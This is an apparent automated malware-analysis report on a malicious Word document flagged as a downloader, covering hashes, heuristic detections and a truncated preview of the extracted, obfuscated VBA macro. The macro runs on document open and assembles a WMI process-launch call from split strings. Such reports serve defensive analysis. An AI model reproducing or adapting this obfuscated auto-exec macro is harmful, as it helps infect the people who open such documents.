Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 acaa26d978decd75…

MALICIOUS

Office (OLE)

145.9 KB Created: 2019-05-01 12:11:00 Authoring application: Microsoft Office Word First seen: 2020-02-04
MD5: 36c83af1ec1f89d1a4c4e81e92250def SHA-1: b124ab7f0ca731ba27add6b8249ed8d1f65fe8e4 SHA-256: acaa26d978decd75aae429b5e4feec5108f99a044c6d6a0d217272578343626c
342 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1203 Exploitation for Client Execution

The sample contains VBA macros that utilize the `GetObject` and `CreateObject` methods to interact with WMI, specifically launching `Win32_Process`. This is a common technique for executing arbitrary code or downloading secondary payloads. The obfuscation of the `winmgmts` string further indicates malicious intent. The ClamAV detection also confirms its malicious nature.

Heuristics 9

  • ClamAV: Doc.Downloader.00536d-6959611-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.00536d-6959611-0
  • VBA macros detected medium 5 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATE
    VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
  • Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATION
    VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 22195 bytes
SHA-256: e83cc570cb6357be277f1dc36db1cc0690e45808062ad6164426982050a5a33d
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "MADQAZBX"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "zA_GcBBC"
Attribute VB_Base = "0{E5FABED2-5D09-470B-AB68-4DE1B02D2F08}{C296A562-7B4E-476A-8752-2E5E5EBF083F}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "lAZoQGB"

Attribute VB_Name = "jGDAwAA"

Attribute VB_Name = "aAAXxQAo"

Attribute VB_Name = "BxABBwA"

Attribute VB_Name = "zCA_U1A"
Attribute VB_Base = "0{860FD737-E3D9-4B12-83F4-26073074266A}{6430A8A0-A2EC-47F2-A4A7-D1F0E89475C9}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "rZAxCUB"
Function K_QDQDD(CQCAA_)
   Select Case GAA4xoA
Case 562220402
Minute CInt(172368050 _
- Tan(iDxQk_AA * Cos(vUADA_) + _
612781366 + 928404273))
End Select
   Select Case nAxwCA1
Case 722578661
Minute CInt(217345090 _
- Tan(sAGDBUAA * Cos(IAAAAUA) + _
609068523 + 878158039))
End Select
   Select Case F_AADAQ
Case 504802116
Minute CInt(269409384 _
- Tan(VGABZAQU * Cos(joU1BBk) + _
285758612 + 495812894))
End Select
Set K_QDQDD = CVar(CQCAA_)
   Select Case joXGAQ
Case 642372825
Minute CInt(857527804 _
- Tan(cADGAA * Cos(UCXcAAAA) + _
265654494 + 540685068))
End Select
   Select Case SC4AAow
Case 20847050
Minute CInt(986330889 _
- Tan(Rw4UAA * Cos(nCAGUQ) + _
269843009 + 574981606))
End Select
   Select Case sUBAAAB4
Case 455227288
Minute CInt(253047170 _
- Tan(vA_UAB * Cos(zAcwQwUA) + _
933209543 + 74908986))
End Select
End Function
Sub autoopen()
   Select Case KAAXAZ
Case 642497119
Minute CInt(181703225 _
- Tan(JGxAA4cc * Cos(hAxkGDAc) + _
664103252 + 685957492))
End Select
   Select Case XGG4GD
Case 703799256
Minute CInt(81578945 _
- Tan(U1UAAAQ * Cos(CBAX4Bx) + _
909336882 + 617387229))
End Select
   Select Case A_AACA
Case 900650784
Minute CInt(241955921 _
- Tan(fo1AA_DA * Cos(JUUxAc) + _
573758774 + 653526745))
End Select
Call KwQQAX
   Select Case b4kZ4wD_
Case 705372864
Minute CInt(57839682 _
- Tan(DU_XAA * Cos(aAAGcGZD) + _
830160224 + 203800841))
End Select
   Select Case qDAAA14
Case 395176598
Minute CInt(931474604 _
- Tan(m_cQUA * Cos(iABBBG) + _
272367672 + 425762302))
End Select
   Select Case lUA1A1A
Case 73545898
Minute CInt(435462980 _
- Tan(CAAADAAo * Cos(qAAwXGAA) + _
852514816 + 45840680))
End Select
End Sub


Attribute VB_Name = "FCxXwA"
Function KwQQAX()
On Error Resume Next
   Select Case FDcABxUC
Case 626636184
Minute CInt(531242096 _
- Tan(qoAAA1xA * Cos(cAUADkA) + _
616431418 + 553143818))
End Select
   Select Case DGwAkxA
Case 779757640
Minute CInt(689477681 _
- Tan(qDAAAo_ * Cos(KUAG_B1A) + _
853526271 + 339676429))
End Select
   Select Case bAUBDBG
Case 533436387
Minute CInt(957147201 _
- Tan(rAGoUwQA * Cos(qAQBXG) + _
538258994 + 562243367))
End Select
Set VcAAXDD = K_QDQDD(GetObject("w" + "inmgmts:W" + "in32_Process" + "Sta" + "rtup"))
   Select Case KDXAXDC
Case 201267541
Minute CInt(345682419 _
- Tan(LU_AQ1 * Cos(dCXAxoA) + _
792458517 + 442369741))
End Select
   Select Case QAAAwA4
Case 683066449
Minute CInt(563040337 _
- Tan(oAAADDAQ * Cos(aAAU1UxB) + _
656105962 + 858600647))
End Select
EwU_AA = vbError - vbError
   Select Case l1wAoDD
Case 780749121
Minute CInt(382246454 _
- Tan(HoACUA * Cos(YBAABABw) + _
263297230 + 64874686))
End Select
   Select Case KCAwCAAx
Case 678107768
Minute CInt(396623115 _
- Tan(oBAAUAkA * Cos(dZwQADwB) + _
910934091 + 957431707))
End Select
   Select Case NQAUBU
Case 939437504
Minute CInt(530405962 _
- Tan(oQ
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.